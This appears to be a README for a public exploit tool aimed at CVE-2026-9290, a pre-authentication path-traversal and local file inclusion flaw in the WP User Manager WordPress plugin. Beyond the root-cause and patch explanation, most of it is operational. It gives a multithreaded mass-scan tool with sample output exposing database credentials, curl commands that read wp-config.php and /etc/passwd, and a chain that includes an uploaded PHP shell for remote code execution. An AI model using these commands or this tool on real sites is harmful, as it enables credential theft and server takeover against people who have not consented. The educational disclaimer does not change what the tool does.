Share
## https://sploitus.com/exploit?id=2A53B779-7331-5763-8652-F0D828CF73A6
CVE-2026-9290 โ€” WP User Manager LFI to RCE Exploit
Pre-Auth Path Traversal via 'tab' Parameter โ†’ Local File Inclusion

---

## Overview

**CVE-2026-9290** is a high-severity (CVSS 7.5) unauthenticated Local File Inclusion vulnerability in the **WP User Manager โ€“ User Profile Builder & Membership** WordPress plugin (โ‰ค 2.9.17).

The `wpum_get_active_profile_tab()` function passes the `tab` query parameter directly to the Gamajo template loader without whitelist validation. Path traversal sequences in the `tab` value allow unauthenticated attackers to include arbitrary PHP files from the server.

### Affected Versions

| WP User Manager Version | Status |
|---|---|
| โ‰ค 2.9.17 | Vulnerable |
| โ‰ฅ 2.9.18 | Patched |

---

## Vulnerability Mechanism

### Root Cause

In `includes/functions.php`, the `wpum_get_active_profile_tab()` function takes the `tab` query parameter without whitelist validation:

```php
// Vulnerable: no whitelist check on $tab value
$tab = isset($_GET['tab']) ? sanitize_text_field($_GET['tab']) : 'profile';
wpum_get_active_profile_tab($tab);
```

The value is passed to `Gamajo_Template_Loader::get_template_part()` which resolves and includes the template file:

```php
// class-gamajo-template-loader.php line 226
include($template_path . $tab . '.php');
```

`sanitize_text_field()` does NOT strip path traversal sequences. `../../../wp-config` passes through.

### Attack Flow

```
GET /profile/?tab=../../../wp-config
  โ†’ wpum_get_active_profile_tab('../../../wp-config')
  โ†’ Gamajo_Template_Loader::include('../../../wp-config.php')
  โ†’ wp-config.php included โ†’ DB credentials exposed
```

### Key Files

| File | Line | Role |
|---|---|---|
| `includes/functions.php` | #L955 | `wpum_get_active_profile_tab()` โ€” no whitelist |
| `templates/profile.php` | #L52 | Profile template scope |
| `class-gamajo-template-loader.php` | #L226 | Unsanitized `include()` |

### Patch (2.9.18)

PR [#445](https://github.com/WPUserManager/wp-user-manager/pull/445) adds whitelist validation:

```php
// Patched: check against registered tabs
if (!array_key_exists($tab, $registered_tabs)) {
    $tab = 'profile'; // fallback to default
}
```

---

## Installation

```bash
git clone https://github.com/shinthink/CVE-2026-9290.git
cd CVE-2026-9290
pip install -r requirements.txt
```

---

## Usage

```bash
# Single target โ€” LFI probe
python cve_2026_9290.py -t target.com

# Mass scan
python cve_2026_9290.py -f targets.txt -v

# Read specific file via LFI
python cve_2026_9290.py -t target.com --read "../../../wp-config.php"

# Save results
python cve_2026_9290.py -f targets.txt -o lfi.txt
```

### Arguments

```
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  --read PATH       Read a specific file via LFI
  -o, --output      Save results to file
  --threads         Workers (default: 25)
  -v, --verbose     Show detailed output
```

---

## Proof of Concept

### Detection & LFI

```bash
$ python cve_2026_9290.py -t target.com -v
```

```
  CVE-2026-9290 โ€” WP User Manager LFI โ†’ RCE Exploit
  CVSS 7.5 | Pre-Auth | Path Traversal via 'tab' Parameter

    [+] WP User Manager detected
    [+] Profile page: /profile/
    [+] LFI confirmed: wp-config.php (DB credentials)
    [+] Content preview: define('DB_NAME', 'wordpress_db'); define('DB_USER', 'admin');

  Host     : target.com
  WPUM     : YES
  LFI      : YES
  File     : wp-config.php (DB credentials)
  Time     : 3.2s
```

### Mass Scan

```
  [LFI]     target-1.com        3.2s  wp-config.php (DB credentials)
            define('DB_NAME', 'wp_db'); define('DB_USER', 'root');
  [LFI]     target-2.com        4.1s  wp-config.php (DB credentials)
            define('DB_NAME', 'site_db'); define('DB_USER', 'admin');
  [200/5458] 3%  |  WPUM:12  LFI:5  |  current-target.com
```

### Manual Exploitation

**Step 1 โ€” Detect WP User Manager**
```bash
curl -sk 'https://target.com/wp-content/plugins/wp-user-manager/readme.txt' | head -3
```

**Step 2 โ€” Find profile page**
```bash
curl -sk 'https://target.com/' | grep -oP 'href="[^"]*(?:profile|account|dashboard)[^"]*"'
```

**Step 3 โ€” LFI via tab parameter**
```bash
# Read wp-config.php
curl -sk 'https://target.com/profile/?tab=../../../wp-config'

# Read /etc/passwd  
curl -sk 'https://target.com/profile/?tab=../../../../../../../etc/passwd'

# RCE โ€” include uploaded PHP shell
curl -sk 'https://target.com/profile/?tab=../../../wp-content/uploads/2026/07/shell'
```

### RCE Chain

```
1. LFI โ†’ read wp-config.php โ†’ get DB credentials
2. Upload PHP shell via another plugin/media endpoint
3. LFI โ†’ include uploaded shell โ†’ RCE
```

---

## Disclaimer

> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse.

---

## References

| Resource | Link |
|---|---|
| GitHub Advisory | [GHSA-83v9-496w-54wx](https://github.com/advisories/GHSA-83v9-496w-54wx) |
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/id/7a5e08d8-c6ef-42a3-9599-28c3bfb35017) |
| Patch PR | [GitHub #445](https://github.com/WPUserManager/wp-user-manager/pull/445) |
| IONIX Analysis | [ionix.io](https://www.ionix.io/threat-center/cve-2026-9290/) |

---


  This project is not affiliated with WP User Manager or Carbon Fields.